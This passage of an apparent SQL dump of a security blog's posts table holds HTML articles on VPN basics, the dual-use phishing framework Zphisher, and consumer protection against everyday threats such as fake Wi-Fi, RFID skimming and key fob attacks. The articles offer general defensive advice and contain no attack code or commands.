leaving your network, so a home VPN protects you on untrusted networks rather than hiding you from the destinations you reach.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Learning Opportunity</strong></b>: It’s a great way to build your technical skills and gain hands-on experience with VPN 
technology.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Public VPN Service</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not ready to build a VPN from scratch or need something for travel? Choosing a reliable VPN provider is essential. Look for providers that offer the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Strong Encryption Protocols</strong></b> (a modern protocol such as WireGuard, OpenVPN or IKEv2/IPsec using an authenticated cipher such as AES-256-GCM or ChaCha20-Poly1305; avoid legacy PPTP, and look for a kill switch that blocks traffic if the tunnel drops)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">No-Logs Policy</strong></b> (a claim you cannot verify yourself, so prefer providers whose no-logs policy has been independently audited, and consider the jurisdiction they operate under)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Servers Around the World</strong></b> (helpful for accessing geo-restricted content)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Fast Connection Speeds</strong></b> (so your browsing and streaming aren’t interrupted)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Compatibility with Multiple Devices</strong></b> (PC, iPhone, Android, etc.)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] 
pb-[2px]\" dir=\"ltr\">Popular options include NordVPN, ExpressVPN, and CyberGhost, all known for their trustworthiness and performance.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From providing anonymity on public networks to empowering you to take control of your home internet security, VPNs are a must-have for anyone serious about online privacy and cybersecurity. For tech enthusiasts eager to learn, building a DIY home VPN is a worthy challenge. And for professionals seeking portable security, public VPN services are invaluable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The next time you connect to free Wi-Fi at your favorite café, remember this: A VPN could be the difference between a safe connection and putting your data at risk.</p>', '', NULL, NULL, 1, 'draft', '2025-01-16 18:21:03', '2026-01-12 21:41:44', 'Information Security', 'VPN Basics: Understanding How VPNs Work and Why They’re Essential for Public Networks', '', NULL),
(73, 'The Rise of Phishing Attacks and the Role of Tools Like Zphisher', 'the-rise-of-phishing-attacks-and-the-role-of-tools-like-zphisher', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to Phishing Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks have quickly become one of the most prevalent and dangerous threats in cybersecurity. These attacks often exploit human vulnerabilities, using deceptive tactics to extract sensitive data or unauthorized access to systems. The consequences? Financial loss, identity theft, and reputational damage on a global scale.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Among the many tools used in phishing schemes, one stands out for its notoriety and dual-purpose nature—<b><strong class=\"font-bold\">Zphisher</strong></b>, an open-source phishing framework. Understanding tools like Zphisher and the ways they’re misused or ethically utilized can help IT professionals and cybersecurity enthusiasts defend against these tactics.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Zphisher Unveiled</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zphisher is a powerful and open-source tool made to replicate the login pages of popular websites like Facebook, Instagram, Gmail, and more. 
By automating the setup process, it simplifies the creation of convincing phishing pages that can lure unsuspecting users into providing credentials.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Zphisher’s extreme ease-of-use makes it dangerous in the wrong hands, it also fulfills a valuable role in cybersecurity research, education, and ethical hacking. Understanding how it works is the first step in developing defenses against such tools.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Dual Nature of Zphisher</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zphisher is a classic example of a double-edged sword in cybersecurity. Here\'s why:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Ethical Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Zphisher is often used by ethical hackers and cybersecurity professionals for penetration testing and security training.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">It helps organizations identify how phishing attempts exploit users, enabling better defenses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">When used responsibly, it’s an educational tool for understanding attack methodologies.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] 
pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malicious Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Attackers can use Zphisher to impersonate well-known sites, often with minimal effort, tricking victims into revealing sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">The widespread accessibility of the tool lowers the barrier for entry, making it appealing to bad actors.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s this dual purpose that emphasizes the importance of promoting ethical use and preventing malicious exploitation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerabilities Highlighted by Tools Like Zphisher</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks continue to evolve, employing increasingly sophisticated tactics. Tools such as Zphisher reveal these vulnerabilities in alarming ways. 
Here are some key insights:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Realistic Website Mimicry</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using tools like Zphisher, attackers can create phishing pages that look nearly identical to legitimate websites. Subtle differences in the domain name are often missed by users, and because phishing sites routinely obtain valid TLS certificates, the padlock icon on its own no longer distinguishes a fake page from the real one; the domain in the address bar is what has to be checked.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trust-Based Exploitation</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emails designed to impersonate communication from trusted institutions, such as banks or government services, often redirect victims to phishing pages managed by frameworks like Zphisher.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Global Impact</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing is a leading method for breaching security globally. 
It accounts for over one-third of data breaches worldwide—a statistic that reinforces the need for advanced defense strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Global Impact of Phishing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks have far-reaching consequences, from small-scale scams to corporate-level breaches. Here are some data points to consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Financial Damage</strong></b> - Costs attributed to phishing attacks are estimated to exceed <b><strong class=\"font-bold\">$17,700 per minute</strong></b> globally.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Identity Theft</strong></b> - Cybercriminals often resell stolen credentials or leverage them for further attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputational Risk</strong></b> - Organizations that fall victim to phishing see a loss in consumer trust, which can take years to rebuild.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These statistics underline the mission-critical need for organizations to stay ahead of phishing risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 
dir=\"ltr\">Responsible Use and Defense Against Phishing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To combat phishing effectively, organizations and professionals must adopt a combination of proactive strategies and responsible tool usage. Here\'s how you can take action:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Education and Training</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Provide regular phishing awareness sessions for employees. Many phishing attacks are successful because of human error. Share examples of recent phishing approaches to ensure your team stays updated.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Enable Two-Factor Authentication (2FA)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers stealing credentials won\'t succeed if additional verification layers, like 2FA, are in place.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Adopt Anti-Phishing Solutions</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Invest in tools that automatically filter and block phishing emails. Advanced email security tools can detect malicious patterns and URLs before they reach inboxes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. 
Verify URLs</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage users to always double-check URLs before entering sensitive information. The presence of \"https\" or a secure padlock icon can help, but it does not by itself validate a website\'s authenticity, because phishing pages are also served over encrypted connections; check the domain name as well.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Reporting Mechanisms</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make it easy for users and employees to report phishing attempts. Early detection and reporting can prevent major issues.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">6. Perform Controlled Penetration Testing</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ethical hackers can use tools like Zphisher in a controlled setting to simulate phishing attacks. This allows organizations to identify and patch vulnerabilities before malicious actors exploit them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Ethical Tool Usage</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s critical to emphasize that tools like Zphisher are not inherently malicious. Their value in teaching cybersecurity professionals how to identify and mitigate phishing threats cannot be overstated. 
That said, misuse is illegal, unethical, and can significantly harm individuals and organizations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adhering to ethical boundaries, security professionals can leverage tools like Zphisher to remediate vulnerabilities and bolster defenses, further advancing the cybersecurity field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks represent one of the greatest challenges in today’s cybersecurity landscape. Zphisher, as a tool, embodies both the risks and opportunities present within this space. While it demonstrates how phishing can exploit trust and human error, it also opens a door to better education and improved defenses.</p>', '', NULL, NULL, 1, 'draft', '2025-01-15 18:59:48', '2026-01-12 21:41:44', 'Tools', 'The Rise of Phishing Attacks and the Role of Tools Like Zphisher', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(74, 'Protecting Yourself from Everyday Cyber Threats', 'protecting-yourself-from-everyday-cyber-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With technology woven into every aspect of our daily lives, protecting yourself from cyber threats is more crucial than ever. Hackers are constantly developing new methods to exploit vulnerabilities, targeting unsuspecting individuals and their devices. This guide highlights common security risks and provides actionable steps to safeguard your personal information and digital life.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Man-in-the-Middle Attacks via Fake Wi-Fi Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Connecting to public Wi-Fi in places like cafes or airports can expose you to man-in-the-middle attacks. Hackers create fake Wi-Fi networks mimicking legitimate ones, intercepting the data you send and receive. 
This could include sensitive information like your passwords and browsing history.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid using public Wi-Fi networks unless absolutely necessary.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use a Virtual Private Network (VPN) to encrypt your internet traffic, making it unreadable to cybercriminals.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. The Dangers of Zero-Click Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zero-click attacks enable hackers to access your devices without requiring you to click or interact with anything. 
These attacks exploit vulnerabilities in your system to silently compromise your device, granting the attacker full access to your data.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly update your phone’s operating system to address security vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Be cautious about downloading apps or software that demand excessive permissions.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. RFID Skimming and Contactless Payment Risks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Contactless payments are convenient, but they come with risks. 
Hackers can use RFID readers to easily steal your credit card information, simply by being in proximity to your wallet.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use an RFID-blocking wallet to prevent unauthorized access to your card details.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Alternatively, wrap your cards in aluminum foil to block RFID signals.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Hacking Car Key Fobs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your car keys aren’t as secure as you might think. 
Hackers can intercept and replicate the rolling codes used by modern key fobs, giving them the ability to unlock your vehicle remotely at any time.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a key fob with built-in RFID shielding.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Store your key fob in a metal box or pouch to block signals when not in use.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Exploiting Wireless Devices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often target wireless peripherals like keyboards and mice. 
By using specialized technology, they can remotely take control of these devices, posing a significant security risk.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Opt for wired keyboards and mice when working on sensitive tasks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">If you prefer wireless devices, choose models with robust encryption features to deter interception.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. The Risk of IoT Devices in Your Home</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From smart refrigerators to internet-connected vacuum cleaners, IoT (Internet of Things) devices are becoming a household norm. 
However, these devices can act as pathways for hackers to access your home network.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be selective about the IoT devices you bring into your home.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Disconnect or isolate unnecessary devices from your main internet network.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Outdated Software is a Major Risk</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outdated software is one of the most easily exploited vulnerabilities. 
Hackers continuously search for older systems to infiltrate, where known vulnerabilities are not yet patched by updates.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Yourself:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly check for and install updates on all your devices, including smartphones, laptops, and tablets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable automatic updates wherever possible to ensure your system is always secure.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. General Cyber Hygiene Tips</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The fundamentals of good cybersecurity go beyond protecting against specific exploits. 
By adopting these habits, you can strengthen your overall security.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Tips:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use a Password Manager</strong></b>: Choose a reliable password manager to generate and store strong, unique passwords for all your accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Install Antivirus Software</strong></b>: Protect your devices against malware and other threats by keeping antivirus software up to 